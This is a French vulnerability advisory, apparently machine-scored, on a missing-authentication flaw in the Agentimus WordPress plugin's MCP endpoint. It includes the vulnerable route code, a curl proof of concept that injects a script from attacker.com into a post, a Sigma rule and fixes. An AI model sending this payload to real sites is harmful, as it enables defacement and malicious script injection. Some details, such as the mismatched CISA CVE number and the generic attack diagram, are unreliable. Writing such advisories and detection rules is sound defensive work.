CVE-2026-84779 : défaut de contrôle d'accès sur l'API MCP du plugin WordPress agentimus
HERMES
SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE
Cible :Agentimus AI SEO & MCP Plugin (agentimus.endpoints.mcp (REST API & MCP Endpoint Handler)) Confiance : 98%
93 / 100
Décomposition des dimensions
Exploitabilité 19 / 20
Activité de menace 18 / 20
Militarisation 18 / 20
Exposition 18 / 20
Prévalence 17 / 20
Impact 19 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 18 / 20
Divergence & Justification opérationnelle
Le CVSS v3.1 évalue cette faille à 9.1 (Critique) et le score Hermes Threat Score s'établit à 93 (CRITIQUE). Tout attaquant distant non authentifié peut altérer le contenu des articles, injecter des redirections malveillantes ou modifier les options du site.
🕸️ Graphe de connaissances connecté & Provenance
CVE-2026-84779: WordPress Agentimus MCP Endpoint Broken Access ControlVULNÉRABILITÉ
Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTAgentimus AI SEO & MCP Plugin
98% VERY_HIGH
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in Agentimus AI SEO & MCP Plugin documented in Hermes dossier.”
Preuves vérifiées associées :
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice d’impact
Section intitulée « 1. Contexte technique & matrice d’impact »| Paramètre | Spécification Technique | Contexte de Menace |
|---|---|---|
| Identifiant CVE | CVE-2026-84779 | Menaces IA Agentique & Protocole MCP |
| Produit ciblé | Agentimus AI SEO & MCP Plugin | Agentimus |
| Composant affecté | agentimus.endpoints.mcp (REST API & MCP Endpoint Handler) | Orchestrateur et couche d’outils agentiques |
| Nature de la faille | CWE-306: Missing Authentication for Critical Function / CWE-862: Missing Authorization | Violation d’intégrité et d’exécution |
| Versions vulnérables | all versions prior to 1.2.9 | Environnements en production |
| Correctif disponible | 1.2.9 | Mise à jour impérative |
2. Analyse technique approfondie
Section intitulée « 2. Analyse technique approfondie »Décomposition du défaut d’autorisation REST API
Section intitulée « Décomposition du défaut d’autorisation REST API »Dans le fichier d’enregistrement des routes (includes/class-mcp-router.php) :
register_rest_route('agentimus/v1', '/mcp', array( 'methods' => 'POST', 'callback' => array($this, 'handle_mcp_request'), 'permission_callback' => '__return_true', // Faille critique : aucune vérification d'authentification));Les méthodes d’outils invoquées exécutaient directement wp_update_post() et update_option() sans exiger de capacité utilisateur (current_user_can).
+----------------------------------------------------------------------------------------------------+| CYCLE D'ATTAQUE CVE-2026-84779 |+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt] │ │ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur ▼ [Agentimus AI SEO & MCP Plugin] │ ├───► 1. Ingestion par agentimus.endpoints.mcp (REST API & MCP Endpoint Handler) │ - Échec de validation, absence de filtrage ou contournement de sandbox │ ├───► 2. Exécution / Mutation d'état │ - Exécution de commandes OS ou exfiltration d'identifiants │ ▼ [Infrastructure Cible Compromise] │ └───► Vol de données, prise de contrôle du serveur ou persistance+----------------------------------------------------------------------------------------------------+3. Preuve de concept (PoC) & analyse du payload
Section intitulée « 3. Preuve de concept (PoC) & analyse du payload »# PoC : Modification non autorisée d'un article WordPress via Agentimus MCPcurl -X POST "https://vulnerable-site.com/wp-json/agentimus/v1/mcp" \ -H "Content-Type: application/json" \ -d '{ "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "update_post_content", "arguments": { "post_id": 1, "post_title": "Hacked via Agentimus MCP", "post_content": "<script src=\"https://attacker.com/malicious_seo.js\"></script>" } } }'4. Ingénierie de détection & télémétrie
Section intitulée « 4. Ingénierie de détection & télémétrie »Règle de détection Sigma
Section intitulée « Règle de détection Sigma »title: WordPress Agentimus MCP Unauthenticated Tool Callid: 84779c01-e779-4a1b-8f22-agentimus01status: highdescription: Detects HTTP POST requests targeting the Agentimus MCP endpoint without preceding cookie or bearer authentication headers.author: Hermes Codex Detection Engineeringdate: 2026-09-07logsource: product: webserver service: access_logdetection: selection: cs-method: 'POST' cs-uri-stem|contains: '/wp-json/agentimus/v1/mcp' condition: selectionlevel: critical5. Guide de remédiation & plan d’action
Section intitulée « 5. Guide de remédiation & plan d’action »- Appliquer les correctifs : mettre à jour
Agentimus AI SEO & MCP Pluginvers la version1.2.9sans délai. - Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
- Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
- Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.